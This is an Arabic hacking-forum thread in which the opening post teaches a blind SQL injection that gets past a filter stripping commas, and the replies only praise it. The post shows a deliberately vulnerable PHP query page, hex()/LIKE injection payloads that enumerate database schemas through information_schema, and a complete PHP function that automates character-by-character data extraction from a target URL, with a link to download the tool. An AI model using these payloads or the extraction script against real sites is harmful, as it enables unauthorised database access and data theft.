1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : V!P-Hero | المشاهدات : 513 | الردود : 6
  1. V!P-Hero DeveloPer Plus

    الأنتساب:
    ‏27 مارس 2012
    المشاركات:
    138
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    50
    الإقامة:
    هنااااااك
    نظام التشغيل:
    Linux
    [​IMG]

    اليوم جايبلكم معي سكربت قوي لتخطي فلتر الفواصل

    السكربت

    كود PHP:
    $ids=$_GET['id'];
    $ids=str_replace(",","",$ids);
    $connect=mysql_connect("localhost""albert""toor") or
        die(
    "Could not connect: " mysql_error());
    $conn=mysql_select_db("band3r",$connect);
     
    $sql="SELECT * FROM `mytable` WHERE `id`='$ids'";

    $result mysql_query($sql);
        if( 
    $result )
        {
            while( 
    $row mysql_fetch_array$result ) )
            {
                echo 
    $row['id'];
                echo 
    '<br>';
                echo 
    $row['****'];
                echo 
    '<br>';
                echo 
    $row['for'];
                echo 
    '<br>';
            }
        }
        else
        {
            echo 
    'error exit';
            exit;
        }

    ?>
    و بعد التفكير
    لايمكنك استعمال اي حقنة
    union query
    لاتنفع
    boolean based and time based
    نفس الشئ
    ما هي الطريقة ؟؟؟؟؟؟؟؟؟؟

    الحل و بعد التفكير العميق ههههه
    حقنة لاتستعمل الفواصل
    +
    اسرع من البليبد العادي
    الحل امامكم

    كود PHP:
    and hex(version()) like 'X%'
    الفكرة كما تلاحظون
    جلب استعلام السكيول و يشفيره و المقاربة
    التشفير بالهكس
    كل حرف مكون من عنصرين
    العنصر الاول من 2 حتى 7

    كود PHP:
    $hex1 = array(1234567);
    العنصر الثاني

    كود PHP:
    $hex2 = array(0123456789'a''b''c''d''e''f');
    الان طريقة العمل

    كود PHP:
    and hex((select group_concat(schema_****) from information_schema.schemata)) like 'X%'
    الان نقوم نتغيير X
    من 2 حتي 7
    حتي تصبح النتيجة صحيحة
    فرضا ان الرقم 6 اصبح النتيجة صحيحة
    الان تصبح

    كود PHP:
    and hex((select group_concat(schema_****) from information_schema.schemata)) like '6X%'
    الان نغس الشئ لكن العنصر الثاني احتمالية 16
    يعني شوف hex2
    و نغير حتي تصبح النتيجة صحيحة
    ثم نكون قد وصلنا الى الحرف الاول

    الطريقة اليدوية صعبة شوية
    جلست اما الجهاز و بعد التفكير الطويل تم الوصول الى برمجة دالة اوتوماتيكي
    تضغ الاستعلام + الهدف تعطيك النتيجة بدون وجع راس
    الدالة :

    كود PHP:
    /*
      coded by massacreur -- toxico-dz
      email :  w ebservers@hotmail.fr
      home : sec4ever.com
    */ 
    function sql_inj($sql) {

      global 
    $target;
      global 
    $end;
      
    $hex1 = array(1234567);
    $hex2 = array(0123456789'a''b''c''d''e''f');
      
    $hex "";
      
    $m 0;
      while (
    $m == 0) {
        for (
    $i 0$i 7$i++) {
          
    $get "' and hex((" $sql ")) like '" $hex $hex1[$i] . $end;
          
    $get str_replace(' ''%20'$get);
          if (
    source($target $get) == 1) {
            
    $hex .= $hex1[$i];
            for (
    $h 0$h 16$h++) {
              
    $get2 "' and hex((" $sql ")) like '" $hex $hex2[$h] . $end;
              
    $get2 str_replace(' ''%20'$get2);
              if (
    source($target $get2) == 1) {
                
    $hex .= $hex2[$h];
                
    $h 20;
                
    $i 20;
                
    $marquer 'massacreur';
              }
            }
          }
          else {
            
    $marquer 'non';
          }
        }
        if (
    $marquer == 'non') {
    ///////
          
    $datas hextostr($hex);
          
    $datas explode(','$datas);
          
    $m 1;
        }
      }
      return 
    $datas;
    }

    function 
    hextostr($x) {
      
    $s '';
      foreach (@ 
    explode("\n"trim(chunk_split($x2))) as $h)
        
    $s .= chr(hexdec($h));
      return (
    $s);
    }
    شرح السكربت + ارفاق السكربت :{y.}

    http://www.iq-team.org/up/uploads/139677053783861.zip

    :{10}:
     
  2. ӎƦ.HmidE DeveloPer Plus

    الأنتساب:
    ‏9 يوليو 2012
    المشاركات:
    106
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    الوظيفة:
    .....
    الإقامة:
    JoRdaN
    رد: يتخطى فلتر الفواصل في الحقن

    مشكور وبارك الله بيك :{12}:
     
  3. Mr.Flash Developer

    الأنتساب:
    ‏14 نوفمبر 2012
    المشاركات:
    10
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    الإقامة:
    In Dreamweaver
    رد: يتخطى فلتر الفواصل في الحقن

    الله يعطيك العافيه &:"
     
  4. - ! • ĻİǾŊ ÄĹ-3ЯÁQ • ! - موقوف لمخالفة الشروط

    الأنتساب:
    ‏17 أكتوبر 2014
    المشاركات:
    79
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: يتخطى فلتر الفواصل في الحقن

    مبـــــــدع آستمر
     
  5. switch hack Developer

    الأنتساب:
    ‏24 يونيو 2014
    المشاركات:
    9
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    Facebook:
    رد: يتخطى فلتر الفواصل في الحقن

    واصل يا بطل
     
  6. Gaza-Dz إدارة الموقع

    الأنتساب:
    ‏26 مايو 2013
    المشاركات:
    1,832
    الإعجابات المتلقاة:
    101
    نقاط الجائزة:
    505
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:
    DZ
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: يتخطى فلتر الفواصل في الحقن

    السلام عليكم ورحمة الله وبركاته
    يـــعــطــيـــك الـصحـــــــــــــة
    بانتظار كل ما هو جديدك
    ربي يفقك يا غالي
     
  7. MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: يتخطى فلتر الفواصل في الحقن

    بوركت يابطل
    برمجة ذهبية
     

مشاركة هذه الصفحة